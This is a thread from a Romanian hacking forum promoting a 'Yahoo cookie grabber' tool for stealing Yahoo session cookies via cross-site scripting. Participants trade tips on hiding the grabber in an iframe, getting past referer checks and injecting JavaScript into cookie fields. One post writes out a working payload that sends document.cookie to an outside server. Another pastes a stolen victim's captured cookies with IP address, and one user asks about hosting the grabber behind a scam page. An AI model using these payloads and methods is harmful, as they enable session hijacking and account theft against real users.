Jump to content
Guest Nemessis

[RST] Professional Yahoo Cookie Grabber [de actualitate]

Recommended Posts

pentru totzi cei care pun intrebari CITITZI CU ATENTZIE :

ACEST TOOL ESTE FACUT PENTRU CEI DEJA FAMILIARIZATI CU XSS SI ATACURI XSS IN SPECIAL DE YAHOO. ACEST TOOL NU ESTE UN TOOL DE GENUL CLICK SI AI COOKIEUL VICTIMEI CI ESTE DOAR UN TOOL CARE II VA FACE MUNCA USOARA ATACATORULUI PRIN DECODAREA DE COOKIE SI LINKURI UTILE.

CONCLUZIE : NU STITI CE INSEAMNA XSS SAU SA LANSATI ATACURI XSS ACEST TOOL NU VA ESTE UTIL.

Cred ca ar trebuii pus pe prima pagina asta,sa intelegi o data.Si acuma ma doare in cot daca va suparati pe mine,voi incercati sa furati cookie cuiva fara cunostinte,de programare,javascript,xss, nici macar minime,si dupa aia sa ii arati la unu ca iai furat cookie si ala sa faca plecaciuni in fata ta!!!!Acest om se numeste RATAT : CAUTATI PE GOOGLE DESPRE XSS,despre JavaScript.

V-am facut update la doua carti sub forma de pdf.

Syngress.Cross.Site.Scripting.Attacks.Xss.Exploits.and.Defense.May.2007

DOWNLOAD

http://rapidshare.com/files/81405173/Syngress.Cross.Site.Scripting.Attacks.Xss.Exploits.and.Defense.May.2007.pdf.html

XSS Attacks

DOWNLOAD

http://rapidshare.com/files/81405810/XSS_Attacks.pdf.html

Link to comment
Share on other sites

Guest Nemessis
ar fi super daca ne-ati da si noua optiunea - prelungirea duratei de functionare a cookieurilor pentru a inlatura limita de 24 ore si mass mail in lista de contacte

Sau ar fi super daca mi-as aduce aminte de cine are ban pe forum si si-a facut alt user. Termina cu prostiile.

Link to comment
Share on other sites

Deci e aceasi metoda, victima trebuie sa dea click pe link?

Daca gandeai mai mult de 5 sec,iti trecea prin cap sa pui prin iframe..

Din cauza functiei escape(document.cookie) sau poate a serverului ( imi dau si eu cu parerea nu zic ca e asa sigur ) grabberul cu toate ca primea cookieul nu il parsa asa ca l-am pus sa parseze $_SERVER["HTTP_REFERER"] si a fost totul ok . Poti sa imi explici si mie cu iframe-ul ala te rog ? Nu mai trebuie click ? devine un fel de csrf ?

Link to comment
Share on other sites

Poti sa imi explici si mie cu iframe-ul ala te rog ?

iframe e folosit pentru a incarca grabber-ul in fundal, in timp ce tu ii afisezi userului o alta pagina. Citeste mai multe despre asta aici.

Cookie este "transat" pentru a da doar valorile Y si T. Un atacator nu poate sa trimita in grabber niciun script pentru ca nu ar trece de "transarea" cookieului.

Nu chiar, se poate injecta foarte bine JS. La "Language" nu poate fi injectat JS pentru ca transforma toate caracterele in caractere mari, iar JS este case-sensitive.

2. chiar daca victima afla unde e grabberul trebe sa treaca de referer test ca sa poata injecta cookie malformat in el

Big deal :P. Folosesti CookieEditor, editez cookie-ul da lal Yahoo! punand JS in ZipCode, si apoi intri normal. Refer-ul va fi corect si injectarea codului va functiona.

incercatzi sa va folositzi mintea inainte de a face posturi ratate si tu si vladiii

dupa o zi de release si deja nu va mai sufar cu intrebarile si posturile idioate ... parerea mea e ca mai bine nu il lansam si gata

Ti se pare idiot sa vorbesc despre securitate pe un forum de securitate ?

Oricum, hai sa incercam sa trecem peste asta. Consider subiectul incheiat.

Link to comment
Share on other sites

Guest Nemessis

Multumim tw8. Intelege si tu ca BanKai are mai multe roluri pe RST. Unul ca developer si celalalt ca sa incinga spiritele. Isi indeplineste indatoririle foarte bine dupa cum vezi.

O sa se corecteze bug-urile in versiunea urmatoare. Nu ne-am dat interesul la posibilitatea de backfire pentru ca principalul scop a fost sa incepem upgradarea clasicelor grabbere.

Link to comment
Share on other sites

Guest BanKai

cu cateva minute inainte de prima plangere referitoare la xss in grabbed.html discutam cu kwe despre un vuln raportat de cineva cum ca ar fi un xss permanent in adminul de pe php bb si ne miram cum sa cauti si sa faci publi astfel de vuln ... cand el e useless ... daca esti admin la ce iti tre xss ... cam aceeasi duda este aici ... dar noah e un bug si btw scrie design by a2head ... stiti ce inseamna asta ? inseamna ca grabbed.html afisheaza ce a vrut a2head sa afiseze ...

Link to comment
Share on other sites

Poti sa imi explici si mie cu iframe-ul ala te rog ?
iframe e folosit pentru a incarca grabber-ul in fundal, in timp ce tu ii afisezi userului o alta pagina. Citeste mai multe despre asta aici.

Stiu ce e ala un iframe si cum se foloseste , eu (am vrut cel putin ) intreb cum dreacu incarci iframe-ul ala in yahoo si faci xss-ul sa fie executat in frame-ul ala.

Link to comment
Share on other sites

Guest BanKai

mai ce nu intelegeti ... aici nu discutam metoda xss ci doar grabberul ... sa raspund la intrebarea ta ... nu nu mai exista metoda automatizata de cookie stealing la yahoo ... ultima a fost descoperita de mine si de neme acum 3-4 luni si a stat la vip vreo 3 saptamani pana a fost patchuita din cauza lu mozi care a scapat'o pe mirc ...

Link to comment
Share on other sites

ma baeti mah,

eu n-am inteles ce vreti voi sa ziceti cu function init() ala ..cum adica nu mai merge?!

Deci eu folosesc graberul vechi cu javascriptu asta:

function init() { new Image().src='http://www.site.com/sdsphp?cookie='+escape(document.cookie); } window.onload=init; si grabberul lui kwerln

si merge struna... pe toate tipurile de browsere IE6, IE7 , Opera 9.2 , Firefox ultima versiune..inclusiv pe mail beta cat si pe versiunea veche de yahoo.

Acum am schimbat grabberul ... l`am pus pe cel nou si merge la fel de bine!

rezultatele sunt chiar spectaculoase!

In finalul acestui post tin sa mentionez urmatoarele:

multumiri lui Bankai, Nemessis, kw3rln, slick, si toti cei care au contribuit la automatizarea grabberului. Mi-ati dat idei ... acum lucrez si eu la o versiune a mea .. sper sa imi reuseasca ... ptr ca as dorii sa adaug si eu cateva chestii..

Mult noroc staff-ului RST si spor in toate proiectele voastre

....am plecat sa ard un Pall Mall ... ciao

Link to comment
Share on other sites

Bankai vreau sa te intreb o chestie ... aseara nu am inteles un lucru :| deci vreau sa pun pe un site graberu asta asa adika pe el sa fie scam care sa intre astia e si pe situ meu .. care il am sa fie grabberul.html sa vad de pe site la mine nu de pe hostu cu scam se poate daca da te rog ajutama

apropo scoate offlinu :D

Link to comment
Share on other sites

Dupa lupte seculare ... am reusit! Am combinat grabberu vechi a lu Slick shi ceva din asta nou, si merge! Si pe IE, si pe Opera si pe Mozilla! Ms baieti si scuze daca v-am enervat :) Trebuie sa fiti mai rabdatori cu incepatorii :)

EDIT

E naspa ca nu intotdeauna imi vine Y shi T .. imi vin cateodata alte chestii, inafara de Y si T :D

Pe mozilla vine Y shi T, pe IE6 nu vine Y si T ...

Exemplu


>> Received from 86.124.193.178 on 6.01.2008 at 8:04am <<
B=4dcr7j93kt37u&b=3&s=13; F=a=2WHkSp0MvT8Cy97c2AxBvNZ7rkozh2ecYAyfyfDtWZ5HcAGXFX.7CB2RSgxr6k.5Moe1yNE-&b=0iCd; PH=fn=g1KUIe.1is3esf6OLQ--&l=en-US; C=mg=1; CP=v=70008&br=i&pc=none; U=mt=C7zgg52MhYqRYLglmX20W0fFKEswKcgDe0Oy_A--&ux=4wegHB&un=e0af4q52iisll; LYC=l_v=0&l_lv=10&l_s=tq311xy0x2uyu1z3yw30st4543uzxw1u&l_um=0_0_1_0_0; D=_ylh=X3oDMTFmbW12azlmBF9TAzI3MTYxNDkEcGlkAzExOTk2OTkwMjQEdGVzdAN2MTAxBHRtcGwDdjEwMS1s

Link to comment
Share on other sites

Guest Nemessis

Totusi uita-te putin la ce se scrie pe aici. Tu esti singurul care are probleme. Nu pricepi ca undeva gresesti? Ai folosit noul google_adsense.php? Fara referer?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...